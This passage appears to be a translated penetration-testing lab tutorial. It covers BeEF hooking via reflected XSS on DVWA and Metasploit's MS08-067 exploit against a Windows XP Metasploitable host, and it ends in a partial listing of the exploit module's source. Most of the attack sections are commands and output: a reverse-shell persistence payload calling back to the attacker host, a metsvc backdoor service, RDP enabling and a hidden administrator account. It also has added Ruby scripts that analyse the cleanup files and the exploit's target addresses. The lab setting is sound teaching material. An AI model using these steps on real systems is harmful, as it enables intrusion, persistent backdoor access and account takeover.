        client_debug: false
        # Used for generating secure tokens
        crypto_default_value_length: 80
    
        # Credentials to authenticate in BeEF.
        # Used by both the RESTful API and the Admin interface
        credentials:
            user:   "beef"
            passwd: "beef"
    
        # Interface / IP restrictions
        restrictions:
            # subnet of IP addresses that can hook to the framework
            permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
            # subnet of IP addresses that can connect to the admin UI
            #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
            permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
            # subnet of IP addresses that cannot be hooked by the framework
            excluded_hooking_subnet: []
            # slow API calls to 1 every  api_attempt_delay  seconds
            api_attempt_delay: "0.05"
    
        # HTTP server
        http:
            debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
            host: "0.0.0.0"
            port: "3000"
    
            # Decrease this setting to 1,000 (ms) if you want more responsiveness
            #  when sending modules and retrieving results.
            # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
            #  when hooking lots of browsers (50+).
            # Enabling WebSockets is generally better (beef.websocket.enable)
            xhr_poll_timeout: 1000
    
            # Host Name / Domain Name
            # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
            # These settings will be used to create a public facing URL
            # This public facing URL will be used for all hook related calls
            # set the public setting below:
            # public:
            #     host: "" # public hostname/IP address
            #     port: "" # public port will default to 80 if no https 443 if https
                          # and local if not set but there is a public host
            #     https: false # true/false
    
            # Reverse Proxy / NAT
            # If you want BeEF to be accessible behind a reverse proxy or NAT,
            #   set both the publicly accessible hostname/IP address and port below:
            # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
            #   by altering the X-FORWARDED-FOR ip address in the request header.
            allow_reverse_proxy: false
    
            # Hook
            hook_file: "/hook.js"
            hook_session_name: "BEEFHOOK"
    
            # Allow one or multiple origins to access the RESTful API using CORS
            # For multiple origins use: "http://browserhacker.com, http://domain2.com"
            restful_api:
                allow_cors: false
                cors_allowed_domains: "http://browserhacker.com"
    
            # Prefer WebSockets over XHR-polling when possible.
            websocket:
                enable: false
                port: 61985 # WS: good success rate through proxies
                # Use encrypted 'WebSocketSecure'
                # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
                secure: true
                secure_port: 61986 # WSSecure
            ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
                ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
    
            # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
            web_server_imitation:
                enable: true
                type: "apache" # Supported: apache, iis, nginx
                hook_404: false # inject BeEF hook in HTTP 404 responses
                hook_root: false # inject BeEF hook in the server home page
            # Experimental HTTPS support for the hook / admin / all other Thin managed web services
            https:
                enable: false
                # Enabled this config setting if you're external facing uri is using https
                public_enabled: false
                # In production environments, be sure to use a valid certificate signed for the value
                # used in beef.http.public (the domain name of the server where you run BeEF)
                key: "beef_key.pem"
                cert: "beef_cert.pem"
    
        database:
            file: "beef.db"
    
        # Autorun Rule Engine
        autorun:
            # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
            # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
            # continue execution regardless of results.
            # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
            result_poll_interval: 300
            result_poll_timeout: 5000
    
            # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
            # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
            continue_after_timeout: true
    
        # Enables DNS lookups on zombie IP addresses
        dns_hostname_lookup: false
    
        # IP Geolocation
        geoip:
            enable: true
            # GeoLite2 City database created by MaxMind, available from https://www.maxmind.com
            database: '/usr/share/GeoIP/GeoLite2-City.mmdb'
    
        # Integration with PhishingFrenzy
        # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
        # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
        integration:
            phishing_frenzy:
                enable: false
    
        # You may override default extension configuration parameters here
        # Note: additional experimental extensions are available in the 'extensions' directory
        #       and can be enabled via their respective 'config.yaml' file
        extension:
            admin_ui:
                enable: true
                base_path: "/ui"
            demos:
                enable: true
            events:
                enable: true
            evasion:
                enable: false
            requester:
                enable: true
            proxy:
                enable: true
            network:
                enable: true
            metasploit:
                enable: false
            social_engineering:
                enable: true
            xssrays:
                enable: true
    

    After changing user and passwd, start Beef

    ./beef
    

    Note the startup messages for later

    [22:56:06][*] running on network interface: 10.10.10.128
    [22:56:06]    |   Hook URL: http://10.10.10.128:3000/hook.js
    [22:56:06]    |_  UI URL:   http://10.10.10.128:3000/ui/panel
    [22:56:06][*] RESTful API key: b2400041e8e3f03c5ee4adcf8ca5cb5e620edd04
    [22:56:06][!] [GeoIP] Could not find MaxMind GeoIP database: '/usr/share/GeoIP/GeoLite2-City.mmdb'
    [22:56:06][*] HTTP Proxy: http://127.0.0.1:6789
    [22:56:06][*] BeEF server started (press control+c to stop)
    

    They include the hook information

    Hook URL: http://10.10.10.128:3000/hook.js
    

    So the JavaScript tag to construct is

    <script src="http://10.10.10.128:3000/hook.js"></script>
    

    Open the Beef console

    http://127.0.0.1:3000/ui/panel
    

    Set DVWA Security to Low, select XSS reflected, enter the JavaScript code and click Submit
    The host information can then be seen
    The Location field needs the GeoIP database, as the error message below indicates; it can be downloaded from my resources

    [22:56:06][!] [GeoIP] Could not find MaxMind GeoIP database: '/usr/share/GeoIP/GeoLite2-City.mmdb'
    

    Note: carrying out a cross-site scripting attack over the Internet requires an Internet-routable IP address

    Network service penetration

    MS08067

    search ms08_067
    
    msf6 > search ms08_067
    
    Matching Modules
    ================
    
       #  Name                                 Disclosure Date  Rank   Check  Description
       -  ----                                 ---------------  ----   -----  -----------
       0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption
    
    
    Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
    
    use exploit/windows/smb/ms08_067_netapi
    set payload windows/meterpreter/bind_tcp
    set RHOST 192.168.10.128
    set LPORT 5000
    set LHOST 10.10.10.128
    set target 7
    exploit
    
    msf6 exploit(windows/smb/ms08_067_netapi) > exploit
    
    [*] 192.168.10.128:445 - Attempting to trigger the vulnerability...
    [*] Started bind TCP handler against 192.168.10.128:5000
    [*] Sending stage (175174 bytes) to 192.168.10.128
    [*] Meterpreter session 1 opened (192.168.10.1:2231 -> 192.168.10.128:5000 ) at 2022-04-16 11:42:28 +0800
    
    meterpreter > sysinfo
    Computer        : DH-CA8822AB9589
    OS              : Windows XP (5.1 Build 2600, Service Pack 3).
    Architecture    : x86
    System Language : en_US
    Domain          : WORKGROUP
    Logged On Users : 1
    Meterpreter     : x86/windows
    

    Add an autorun entry so that at boot the target connects back to the attacking host 10.10.10.128 on port 443

    run persistence -X -i 5 -p 443 -r 10.10.10.128
    
    meterpreter > run persistence -X -i 5 -p 443 -r 10.10.10.128
    
    [!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
    [!] Example: run exploit/windows/local/persistence OPTION=value [...]
    [*] Running Persistence Script
    [*] Resource file for cleanup created at C:/Users/IDEA/.msf4/logs/persistence/DH-CA8822AB9589_20220417.5804/DH-CA8822AB9589_20220417.5804.rc
    [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=443
    [*] Persistent agent script is 99622 bytes long
    [+] Persistent Script written to C:\WINDOWS\TEMP\GbwkRkc.vbs
    [*] Executing script C:\WINDOWS\TEMP\GbwkRkc.vbs
    [+] Agent executed with PID 4044
    [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MNeInNfOCaA
    [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MNeInNfOCaA
    

    After the target reboots, the already compromised host can be reached again through the existing backdoor

    use exploit/multi/handler
    set payload windows/meterpreter/bind_tcp
    set LHOST 10.10.10.128
    set LPORT 443
    exploit
    
    msf6 > use exploit/multi/handler
    msf6 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
    payload => windows/meterpreter/bind_tcp
    msf6 exploit(multi/handler) > set LHOST 10.10.10.128
    LHOST => 10.10.10.128
    msf6 exploit(multi/handler) > set LPORT 443
    LPORT => 443
    msf6 exploit(multi/handler) > exploit
    
    [*] Started bind TCP handler against :443
    

    Use metsvc to install Meterpreter on the target host as a system service

    run metsvc
    
    meterpreter > run metsvc
    
    [!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
    [!] Example: run exploit/windows/local/persistence OPTION=value [...]
    [*] Creating a meterpreter service on port 31337
    [*] Creating a temporary installation directory C:\WINDOWS\TEMP\uIaJuExSqtDr...
    [*]  >> Uploading metsrv.x86.dll...
    [*]  >> Uploading metsvc-server.exe...
    [*]  >> Uploading metsvc.exe...
    [*] Starting the service...
             * Installing service metsvc
     * Starting service
    Service metsvc successfully installed.
    
    meterpreter >
    

    Enable Remote Desktop on the target host and add a user account

    run post/windows/manage/enable_rdp
    
    meterpreter > run post/windows/manage/enable_rdp
    
    [*] Enabling Remote Desktop
    [*]     RDP is disabled; enabling it ...
    [*] Setting Terminal Services service startup mode
    [*]     The Terminal Services service is not set to auto, changing it to auto ...
    [*]     Opening port in local firewall if necessary
    [*] For cleanup execute Meterpreter resource file: C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
    

    In WinXP Metasploitable you can see that Remote Desktop is now enabled

    run getgui -u metasploit -p meterpreter
    
    meterpreter > run getgui -u metasploit -p meterpreter
    
    [!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
    [!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
    [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
    [*] Carlos Perez carlos_perez@darkoperator.com
    [*] Setting user account for logon
    [*]     Adding User: metasploit with Password: meterpreter
    [*]     Hiding user from Windows Login screen
    [*]     Adding User: metasploit to local group 'Remote Desktop Users'
    [*]     Adding User: metasploit to local group 'Administrators'
    [*] You can now login with the created user
    [*] For cleanup use command: run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1259.rc
    

    In WinXP Metasploitable you can see the added user

    Obtain privileges

    getsystem
    

    Check the current privileges

    getuid
    

    SYSTEM is the highest privilege level on the system

    Per the prompt, once the work is done, run C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1259.rc to clear the traces: it removes the hidden-account entry and deletes the added account

    [*] For cleanup use command: run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1259.rc
    
    run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1737.rc
    
    meterpreter > run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1737.rc
    [*] Running Command List ...
    [*]     Running command execute -H -f cmd.exe -a "/c net user metasploit /delete"
    Process 2956 created.
    [*]     Running command reg deleteval -k HKLM\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList -v metasploit
    Successfully deleted metasploit.
    

    Refresh the user list on the WinXP Metasploitable target; the added account is gone.

    enable_rdp likewise printed a cleanup hint: once the work is done, run the resource file it named to disable Remote Desktop again.

    [*] For cleanup execute Meterpreter resource file: C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
    
    run multi_console_command -r C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
    
    meterpreter > run multi_console_command -r C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
    [*] Running Command List ...
    [*]     Running command reg setval -k 'HKLM\System\CurrentControlSet\Control\Terminal Server' -v 'fDenyTSConnections' -d "1"
    Successfully set fDenyTSConnections of REG_SZ.
    [*]     Running command execute -H -f cmd.exe -a "/c sc config termservice start= disabled"
    Process 3264 created.
    [*]     Running command execute -H -f cmd.exe -a "/c sc stop termservice"
    Process 2880 created.
    [*]     Running command execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"
    Process 3180 created.
    

    On the WinXP Metasploitable target, Remote Desktop shows as disabled again.

    Read the resource file before running it: the last command above sets the firewall's remotedesktop service to mode = enable, so the firewall exception opened by enable_rdp is left in place rather than removed and has to be closed by hand (netsh firewall set service type = remotedesktop mode = disable).
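    Both resource files are executed blind by multi_console_command, so they are worth reading before they are run. The following Ruby script is an added example, not part of the original article and not Metasploit's own code: it parses resource-file lines with shell-style quoting (an assumption that holds for the lines shown), reports what each command undoes, and flags the netsh line that enables rather than removes the firewall exception. The file contents are constructed by reconstructing the command lines echoed above; the real files live under ~/.msf4 and carry a per-session timestamp.

```ruby
require 'shellwords'

# Constructed sample input: the two cleanup resource files, reconstructed from
# the command lines echoed by multi_console_command above.
GETGUI_CLEANUP = <<~'RC'
  execute -H -f cmd.exe -a "/c net user metasploit /delete"
  reg deleteval -k HKLM\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList -v metasploit
RC

ENABLE_RDP_CLEANUP = <<~'RC'
  reg setval -k 'HKLM\System\CurrentControlSet\Control\Terminal Server' -v 'fDenyTSConnections' -d "1"
  execute -H -f cmd.exe -a "/c sc config termservice start= disabled"
  execute -H -f cmd.exe -a "/c sc stop termservice"
  execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"
RC

# Collect the values that follow the given "-x" flags.
def flag_values(words, flags)
  out = {}
  words.each_with_index do |w, i|
    out[w] = words[i + 1] if flags.include?(w) && i + 1 < words.size
  end
  out
end

# Turn one resource-file line into a hash describing the Meterpreter command.
# Shell-style quoting (assumed here) is undone by Shellwords, so '\\' becomes
# '\' and '\ ' becomes a space inside the registry key path.
def parse_rc_line(line)
  words = Shellwords.split(line)
  return nil if words.empty?
  case words.first
  when 'execute'
    opts = flag_values(words.drop(1), %w[-f -a])
    { cmd: 'execute', hidden: words.include?('-H'), file: opts['-f'], args: opts['-a'] }
  when 'reg'
    opts = flag_values(words.drop(2), %w[-k -v -d])
    { cmd: "reg #{words[1]}", key: opts['-k'], value: opts['-v'], data: opts['-d'] }
  else
    { cmd: words.first, raw: line.strip }
  end
end

# What one "execute ... cmd.exe /c ..." line undoes, or a warning when it
# does not revert anything.
def review_execute(args)
  case args
  when %r{\bnet user (\S+) /delete\b}         then "ok: removes local account #{$1}"
  when /\bsc config (\S+) start= disabled\b/  then "ok: service #{$1} start type set to disabled"
  when /\bsc stop (\S+)\b/                    then "ok: stops service #{$1}"
  when /\bnetsh firewall .* mode = enable\b/  then 'WARN: firewall exception for remote desktop is ENABLED, not removed; close it by hand'
  else "check: #{args}"
  end
end

# Review a cleanup resource file before handing it to multi_console_command.
# Returns one hash per command, each with a :finding string.
def review_cleanup(rc_text)
  commands = rc_text.each_line.map { |l| parse_rc_line(l) }.compact
  commands.map do |c|
    finding =
      case c[:cmd]
      when 'execute'
        review_execute(c[:args].to_s)
      when 'reg setval'
        if c[:value] == 'fDenyTSConnections' && c[:data] == '1'
          'ok: RDP connections denied again'
        else
          "check: sets #{c[:key]}\\#{c[:value]} = #{c[:data]}"
        end
      when 'reg deleteval'
        if c[:key].to_s.end_with?('SpecialAccounts\\UserList')
          "ok: removes the logon-screen hiding entry for #{c[:value]}"
        else
          "check: deletes #{c[:key]}\\#{c[:value]}"
        end
      else
        "check: #{c[:raw]}"
      end
    c.merge(finding: finding)
  end
end

if $PROGRAM_NAME == __FILE__
  (review_cleanup(GETGUI_CLEANUP) + review_cleanup(ENABLE_RDP_CLEANUP)).each do |c|
    puts "#{c[:cmd].ljust(13)} #{c[:finding]}"
  end
end
```

    Run it as a plain Ruby script; the WARN line is the one to act on before the session is closed. Any line that comes back as "check:" is a command the reviewer does not recognise and should be read by hand.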

    Viewing the MS08-067 module source

    exploit/windows/smb/ms08_067_netapi
    
    C:\metasploit-framework\embedded\framework\modules\exploits\windows\smb\ms08_067_netapi.rb
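
    Most of the listing below is the Targets table: one hard-coded Ret/DisableNX pair per Windows build and language, because the gadgets live in a DLL (ACGENRAL.DLL for the XP targets) whose load address differs between localized builds, and the module description warns that a wrong target crashes the svchost that hosts the Server service and a dozen others. The following Ruby script is an added example, not from the article or the module: it takes a constructed subset of the XP (NX) entries, with values copied from the listing, and checks how they relate, namely whether Ret and DisableNX shift by the same amount relative to the English entry of the same service pack (the same two gadgets, rebased) and which entries are byte-for-byte identical and therefore interchangeable.

```ruby
# Constructed subset of the module's XP (NX) targets, values copied from the
# listing as [Ret, DisableNX]. Enough entries to show the pattern.
XP_NX_TARGETS = {
  'Windows XP SP2 English (NX)'                        => [0x6f88f727, 0x6f8916e2],
  'Windows XP SP2 Arabic (NX)'                         => [0x6fd8f727, 0x6fd916e2],
  'Windows XP SP2 Chinese - Traditional / Taiwan (NX)' => [0x5860f727, 0x586116e2],
  'Windows XP SP2 Chinese - Traditional (NX)'          => [0x5860f727, 0x586116e2],
  'Windows XP SP2 Italian (NX)'                        => [0x596bf727, 0x596c16e2],
  'Windows XP SP2 Portuguese (NX)'                     => [0x596bf727, 0x596c16e2],
  'Windows XP SP2 Japanese (NX)'                       => [0x567fd3be, 0x568016e2],
  'Windows XP SP3 English (NX)'                        => [0x6f88f807, 0x6f8917c2],
  'Windows XP SP3 German (NX)'                         => [0x6fd9f807, 0x6fda17c2],
  'Windows XP SP3 Japanese (NX)'                       => [0x567fd4d2, 0x568017c2],
}.freeze

# Entries for one service pack, selected by the " SPn " token in the name.
def targets_for(targets, sp)
  targets.select { |name, _| name.include?(" #{sp} ") }
end

# Express every entry relative to a reference entry of the same service pack.
# When Ret and DisableNX move by the same amount, the entry is the same gadget
# pair in the same DLL, just loaded at another base in that localized build,
# and :gadget_gap (DisableNX - Ret) is constant across the whole group.
def rebase_report(targets, reference)
  ref_ret, ref_nx = targets.fetch(reference)
  targets.map do |name, (ret, nx)|
    ret_shift = ret - ref_ret
    nx_shift  = nx - ref_nx
    { name: name, ret_shift: ret_shift, nx_shift: nx_shift,
      same_gadgets: ret_shift == nx_shift, gadget_gap: nx - ret }
  end
end

# Groups of targets whose addresses are identical: interchangeable choices.
def identical_targets(targets)
  targets.group_by { |_, addrs| addrs }
         .values.select { |group| group.size > 1 }
         .map { |group| group.map(&:first) }
end

# Signed hex for readable deltas.
def hex(n)
  n.negative? ? format('-0x%x', -n) : format('0x%x', n)
end

if $PROGRAM_NAME == __FILE__
  %w[SP2 SP3].each do |sp|
    ref = "Windows XP #{sp} English (NX)"
    rebase_report(targets_for(XP_NX_TARGETS, sp), ref).each do |r|
      flag = r[:same_gadgets] ? 'same gadgets, rebased by' : 'DIFFERENT gadget pair; Ret moved by'
      puts format('%-52s gap %-7s %s %s', r[:name], hex(r[:gadget_gap]), flag, hex(r[:ret_shift]))
    end
  end
  identical_targets(XP_NX_TARGETS).each { |names| puts "identical: #{names.join(' == ')}" }
end
```

    Running the script shows the non-Japanese entries sharing one DisableNX - Ret gap per service pack and differing only in the DLL base, the Japanese entries using a different Ret gadget, and the two Chinese Traditional entries (and Italian/Portuguese on SP2) being the same addresses under two names. That is the brittleness behind the Automatic Targeting entry: the fingerprint has to identify both service pack and language, because the addresses are not valid anywhere else.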
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = GreatRanking
    
      include Msf::Exploit::Remote::DCERPC
      include Msf::Exploit::Remote::SMB::Client
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'MS08-067 Microsoft Server Service Relative Path Stack Corruption',
          'Description'    => %q{
              This module exploits a parsing flaw in the path canonicalization code of
            NetAPI32.dll through the Server Service. This module is capable of bypassing
            NX on some operating systems and service packs. The correct target must be
            used to prevent the Server Service (along with a dozen others in the same
            process) from crashing. Windows XP targets seem to handle multiple successful
            exploitation events, but 2003 targets will often crash or hang on subsequent
            attempts. This is just the first version of this module, full support for
            NX bypass on 2003, along with other platforms, is still in development.
          },
          'Author'         =>
            [
              'hdm', # with tons of input/help/testing from the community
              'Brett Moore <brett.moore[at]insomniasec.com>',
              'frank2 <frank2[at]dc949.org>', # check() detection
              'jduck', # XP SP2/SP3 AlwaysOn DEP bypass
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              %w(CVE 2008-4250),
              %w(OSVDB 49243),
              %w(MSB MS08-067),
              # If this vulnerability is found, ms08-67 is exposed as well
              ['URL', 'http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos']
            ],
          'DefaultOptions' =>
            {
              'EXITFUNC' => 'thread',
            },
          'Privileged'     => true,
          'Payload'        =>
            {
              'Space'    => 408,
              'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40",
              'Prepend'  => "\x81\xE4\xF0\xFF\xFF\xFF", # stack alignment
              'StackAdjustment' => -3500,
    
            },
          'Platform'       => 'win',
          'DefaultTarget'  => 0,
          'Targets'        =>
            [
              #
              # Automatic targetting via fingerprinting
              #
              ['Automatic Targeting', { 'auto' => true }],
    
              #
              # UNIVERSAL TARGETS
              #
    
              #
              # Antoine's universal for Windows 2000
              # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
              #
              ['Windows 2000 Universal',
               {
                 'Ret'       => 0x001f1cb0,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP EDI SVCHOST.EXE
    
              #
              # Standard return-to-ESI without NX bypass
              # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
              #
              ['Windows XP SP0/SP1 Universal',
               {
                 'Ret'       => 0x01001361,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP ESI SVCHOST.EXE
    
              # Standard return-to-ESI without NX bypass
              ['Windows 2003 SP0 Universal',
               {
                 'Ret'       => 0x0100129e,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP ESI SVCHOST.EXE
    
              #
              # ENGLISH TARGETS
              #
    
              # jduck's AlwaysOn NX Bypass for XP SP2
              ['Windows XP SP2 English (AlwaysOn NX)',
               {
                 # No pivot is needed, we drop into our rop
                 'Scratch' => 0x00020408,
                 'UseROP'  => '5.1.2600.2180'
               }
              ],
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 English (NX)',
               {
                 'Ret'       => 0x6f88f727,
                 'DisableNX' => 0x6f8916e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # jduck's AlwaysOn NX Bypass for XP SP3
              ['Windows XP SP3 English (AlwaysOn NX)',
               {
                 # No pivot is needed, we drop into our rop
                 'Scratch' => 0x00020408,
                 'UseROP'  => '5.1.2600.5512'
               }
              ],
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP3 English (NX)',
               {
                 'Ret'       => 0x6f88f807,
                 'DisableNX' => 0x6f8917c2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              #
              # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
              #
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Arabic (NX)',
               {
                 'Ret'       => 0x6fd8f727,
                 'DisableNX' => 0x6fd916e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Chinese - Traditional / Taiwan (NX)',
               {
                 'Ret'       => 0x5860f727,
                 'DisableNX' => 0x586116e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Chinese - Simplified (NX)',
               {
                 'Ret'       => 0x58fbf727,
                 'DisableNX' => 0x58fc16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Chinese - Traditional (NX)',
               {
                 'Ret'       => 0x5860f727,
                 'DisableNX' => 0x586116e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Czech (NX)',
               {
                 'Ret'       => 0x6fe1f727,
                 'DisableNX' => 0x6fe216e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Danish (NX)',
               {
                 'Ret'       => 0x5978f727,
                 'DisableNX' => 0x597916e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 German (NX)',
               {
                 'Ret'       => 0x6fd9f727,
                 'DisableNX' => 0x6fda16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Greek (NX)',
               {
                 'Ret'       => 0x592af727,
                 'DisableNX' => 0x592b16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Spanish (NX)',
               {
                 'Ret'       => 0x6fdbf727,
                 'DisableNX' => 0x6fdc16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Finnish (NX)',
               {
                 'Ret'       => 0x597df727,
                 'DisableNX' => 0x597e16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 French (NX)',
               {
                 'Ret'       => 0x595bf727,
                 'DisableNX' => 0x595c16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Hebrew (NX)',
               {
                 'Ret'       => 0x5940f727,
                 'DisableNX' => 0x594116e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Hungarian (NX)',
               {
                 'Ret'       => 0x5970f727,
                 'DisableNX' => 0x597116e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Italian (NX)',
               {
                 'Ret'       => 0x596bf727,
                 'DisableNX' => 0x596c16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Japanese (NX)',
               {
                 'Ret'       => 0x567fd3be,
                 'DisableNX' => 0x568016e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Korean (NX)',
               {
                 'Ret'       => 0x6fd6f727,
                 'DisableNX' => 0x6fd716e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Dutch (NX)',
               {
                 'Ret'       => 0x596cf727,
                 'DisableNX' => 0x596d16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Norwegian (NX)',
               {
                 'Ret'       => 0x597cf727,
                 'DisableNX' => 0x597d16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Polish (NX)',
               {
                 'Ret'       => 0x5941f727,
                 'DisableNX' => 0x594216e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Portuguese - Brazilian (NX)',
               {
                 'Ret'       => 0x596ff727,
                 'DisableNX' => 0x597016e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
              ['Windows XP SP2 Portuguese (NX)',
               {
                 'Ret'       => 0x596bf727,
                 'DisableNX' => 0x596c16e2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
    
              # Metasploit's NX bypass for XP SP2/SP3
